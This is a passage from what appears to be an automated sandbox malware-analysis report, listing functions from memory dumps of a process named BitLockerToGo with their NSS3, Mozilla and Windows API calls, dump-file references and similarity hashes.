                                                                                                                                                                                                                                                                                                                    • SECOID_GetAlgorithmTag_Util.NSS3(6CB02C2A), ref: 6CB00C81
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEBE30: SECOID_FindOID_Util.NSS3(6CAA311B,00000000,?,6CAA311B,?), ref: 6CAEBE44
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD8500: SECOID_GetAlgorithmTag_Util.NSS3(6CAD95DC,00000000,00000000,00000000,?,6CAD95DC,00000000,00000000,?,6CAB7F4A,00000000,?,00000000,00000000), ref: 6CAD8517
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB00CC4
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFAB0: free.MOZGLUE(?,-00000001,?,?,6CA8F673,00000000,00000000), ref: 6CAEFAC7
                                                                                                                                                                                                                                                                                                                    • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CB00CD5
                                                                                                                                                                                                                                                                                                                    • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CB00D1D
                                                                                                                                                                                                                                                                                                                    • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CB00D3B
                                                                                                                                                                                                                                                                                                                    • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CB00D7D
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CB00DB5
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB00DC1
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(00000000), ref: 6CB00DF7
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CB00E05
                                                                                                                                                                                                                                                                                                                    • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CB00E0F
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CAB7F4A,00000000,?,00000000,00000000), ref: 6CAD95E0
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CAB7F4A,00000000,?,00000000,00000000), ref: 6CAD95F5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CAD9609
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CAD961D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD95C0: PK11_GetInternalSlot.NSS3 ref: 6CAD970B
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CAD9756
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD95C0: PK11_GetIVLength.NSS3(?), ref: 6CAD9767
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CAD977E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAD95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CAD978E
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3136566230-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 553a506b617271cf2e126c22c1165939e2598e3f40198a03f97337c79e0cdc9d
                                                                                                                                                                                                                                                                                                                    • Instruction ID: c0e7bc7cbded0564194bcf8fca6101b1d626b146b20146e1a8c1ef04fb387274
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 553a506b617271cf2e126c22c1165939e2598e3f40198a03f97337c79e0cdc9d
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7541C4B5A00296ABEB009F64ED45BAF7A74EF44308F140128ED1567741E735AA58CBF2
                                                                                                                                                                                                                                                                                                                    Function 6C9DAC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2699721657.000000006C971000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C970000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699486259.000000006C970000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699838206.000000006C9ED000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2699872874.000000006C9FE000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700050064.000000006CA02000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c970000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 1192971331-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 0ffd047bf3584394b4e44680fd09b67e629e9a863ce3015c6f9a13d844ef8b40
                                                                                                                                                                                                                                                                                                                    • Instruction ID: fb4ed90b6ca2e632dd4134d865e26d44d91ccabd0c20d6683f32847b16d450df
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ffd047bf3584394b4e44680fd09b67e629e9a863ce3015c6f9a13d844ef8b40
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82314FB1A087448FDB00AF78D64826EBBF0BF85305F11892DE99597211EB709458CB82
                                                                                                                                                                                                                                                                                                                    Function 6CA96DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • SECITEM_ArenaDupItem_Util.NSS3(?,6CA97D8F,6CA97D8F,?,?), ref: 6CA96DC8
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CAEFE08
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CAEFE1D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CAEFE62
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CA97D8F,?,?), ref: 6CA96DD5
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF10F3
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: EnterCriticalSection.KERNEL32(?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF110C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PL_ArenaAllocate.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1141
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PR_Unlock.NSS3(?,?,?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF1182
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: TlsGetValue.KERNEL32(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF119C
                                                                                                                                                                                                                                                                                                                    • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBB8FA0,00000000,?,?,?,?,6CA97D8F,?,?), ref: 6CA96DF7
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBC18D0,?), ref: 6CAEB095
                                                                                                                                                                                                                                                                                                                    • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CA96E35
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6CAEFE29
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6CAEFE3D
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6CAEFE6F
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CA96E4C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAF10C0: PL_ArenaAllocate.NSS3(?,6CA98802,00000000,00000008,?,6CA8EF74,00000000), ref: 6CAF116E
                                                                                                                                                                                                                                                                                                                    • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBB8FE0,00000000), ref: 6CA96E82
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA96AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6CA9B21D,00000000,00000000,6CA9B219,?,6CA96BFB,00000000,?,00000000,00000000,?,?,?,6CA9B21D), ref: 6CA96B01
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CA96AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6CA96B8A
                                                                                                                                                                                                                                                                                                                    • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6CA96F1E
                                                                                                                                                                                                                                                                                                                    • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6CA96F35
                                                                                                                                                                                                                                                                                                                    • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CBB8FE0,00000000), ref: 6CA96F6B
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE005,00000000,6CA97D8F,?,?), ref: 6CA96FE1
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 587344769-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: af44f848594069048d7a6200c5502a40d9607f67c35e241f48d2cd3fc4ea68a3
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5ee2997fff37f9d68b84ad98174a70a564085b43ab71514ee8548f9ba7b703a4
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af44f848594069048d7a6200c5502a40d9607f67c35e241f48d2cd3fc4ea68a3
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4717D71D202569BDB40CF15CD41AAABBE4BF98308F194229E809D7B11E771EAD8CBD0
                                                                                                                                                                                                                                                                                                                    Function 6CADADC0 Relevance: 15.1, APIs: 10, Instructions: 148COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAE10
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAE24
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,?,6CABD079,00000000,00000001), ref: 6CADAE5A
                                                                                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAE6F
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(85145F8B,?,?,?,?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAE7F
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAEB1
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAEC9
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAEF1
                                                                                                                                                                                                                                                                                                                    • free.MOZGLUE(6CABCDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6CABCDBB,?), ref: 6CADAF0B
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6CABCDBB,?,6CABD079,00000000,00000001), ref: 6CADAF30
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 161582014-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 4e73ca159282f188fa1ceffff0500e2d846f7f0ecd97625c4a3bc5f231fc56d8
                                                                                                                                                                                                                                                                                                                    • Instruction ID: de5410802ba30f838d85202bb027bbd208832ce82f98635ee0561bd353660dbf
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e73ca159282f188fa1ceffff0500e2d846f7f0ecd97625c4a3bc5f231fc56d8
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A519EB5A01A12AFDB01DF29D884B5AB7B5FF08318F194664E81897B11E731FCA4CBD1
                                                                                                                                                                                                                                                                                                                    Function 6CAB4CA0 Relevance: 15.1, APIs: 10, Instructions: 142COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,00000000,00000000,?,6CABAB7F,?,00000000,?), ref: 6CAB4CB4
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(0000001C,?,6CABAB7F,?,00000000,?), ref: 6CAB4CC8
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32(?,6CABAB7F,?,00000000,?), ref: 6CAB4CE0
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?,?,6CABAB7F,?,00000000,?), ref: 6CAB4CF4
                                                                                                                                                                                                                                                                                                                    • PL_HashTableLookup.NSS3(?,?,?,6CABAB7F,?,00000000,?), ref: 6CAB4D03
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,00000000,?), ref: 6CAB4D10
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DD70: TlsGetValue.KERNEL32 ref: 6CB3DD8C
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB3DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CB3DDB4
                                                                                                                                                                                                                                                                                                                    • PR_Now.NSS3(?,00000000,?), ref: 6CAB4D26
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB59DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CBA0A27), ref: 6CB59DC6
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB59DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CBA0A27), ref: 6CB59DD1
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CB59DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB59DED
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,00000000,?), ref: 6CAB4D98
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6CAB4DDA
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6CAB4E02
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 4032354334-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: fda45a1bf4eced04069f6672df87c0c7d3f29286274bc0c9b4d38524a77c580e
                                                                                                                                                                                                                                                                                                                    • Instruction ID: 5c8dd3d5ca35b75dafa1adb43a4a13bf6c916684763fb0647cb2b08f0c162d79
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fda45a1bf4eced04069f6672df87c0c7d3f29286274bc0c9b4d38524a77c580e
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E741D8B5900215ABEB019F78ED44AAA77BCFF05258F084170EC1897B12FB31E9A8C7D1
                                                                                                                                                                                                                                                                                                                    Function 6CA92E00 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CA92CDA,?,00000000), ref: 6CA92E1E
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFD80: PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CA99003,?), ref: 6CAEFD91
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFD80: PORT_Alloc_Util.NSS3(A4686CAF,?), ref: 6CAEFDA2
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFD80: memcpy.VCRUNTIME140(00000000,12D068C3,A4686CAF,?,?), ref: 6CAEFDC4
                                                                                                                                                                                                                                                                                                                    • SECITEM_DupItem_Util.NSS3(?), ref: 6CA92E33
                                                                                                                                                                                                                                                                                                                      • Part of subcall function 6CAEFD80: free.MOZGLUE(00000000,?,?), ref: 6CAEFDD1
                                                                                                                                                                                                                                                                                                                    • TlsGetValue.KERNEL32 ref: 6CA92E4E
                                                                                                                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 6CA92E5E
                                                                                                                                                                                                                                                                                                                    • PL_HashTableLookup.NSS3(?), ref: 6CA92E71
                                                                                                                                                                                                                                                                                                                    • PL_HashTableRemove.NSS3(?), ref: 6CA92E84
                                                                                                                                                                                                                                                                                                                    • PL_HashTableAdd.NSS3(?,00000000), ref: 6CA92E96
                                                                                                                                                                                                                                                                                                                    • PR_Unlock.NSS3 ref: 6CA92EA9
                                                                                                                                                                                                                                                                                                                    • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CA92EB6
                                                                                                                                                                                                                                                                                                                    • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CA92EC5
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: Util$HashItem_Table$Alloc_$CriticalEnterErrorLookupRemoveSectionUnlockValueZfreefreememcpy
                                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                                    • API String ID: 3332421221-0
                                                                                                                                                                                                                                                                                                                    • Opcode ID: 9d4bece125449d31a60d9d03ad645c78cdf3bcfc3debd3b55ba2ec04f6eb866a
                                                                                                                                                                                                                                                                                                                    • Instruction ID: d3098d630c6092ccc64cc1fdaabbea40cffa57fc0919cc1a0abfb67dafc43ef5
                                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d4bece125449d31a60d9d03ad645c78cdf3bcfc3debd3b55ba2ec04f6eb866a
                                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CD21F576A00144A7EF016E74FC4AE9A3EB9DB8234DF080130ED2887711F732D5A8D6A2
                                                                                                                                                                                                                                                                                                                    Function 6CA1CEC0 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 199COMMON
                                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                                    • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A7E,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CA1B999), ref: 6CA1CFF3
                                                                                                                                                                                                                                                                                                                    • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000109DA,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,00000000,?,00000000,?,?,6CA1B999), ref: 6CA1D02B
                                                                                                                                                                                                                                                                                                                    • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A70,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,00000000,?,?,6CA1B999), ref: 6CA1D041
                                                                                                                                                                                                                                                                                                                    • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6CA1B999), ref: 6CB6972B
                                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.2700157450.000000006CA11000.00000020.00000001.01000000.00000011.sdmp, Offset: 6CA10000, based on PE: true
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700099356.000000006CA10000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700306655.000000006CBAF000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700364892.000000006CBEE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700409040.000000006CBEF000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700443101.000000006CBF0000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.2700476958.000000006CBF5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6ca10000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                                    • API ID: sqlite3_log$_byteswap_ushort
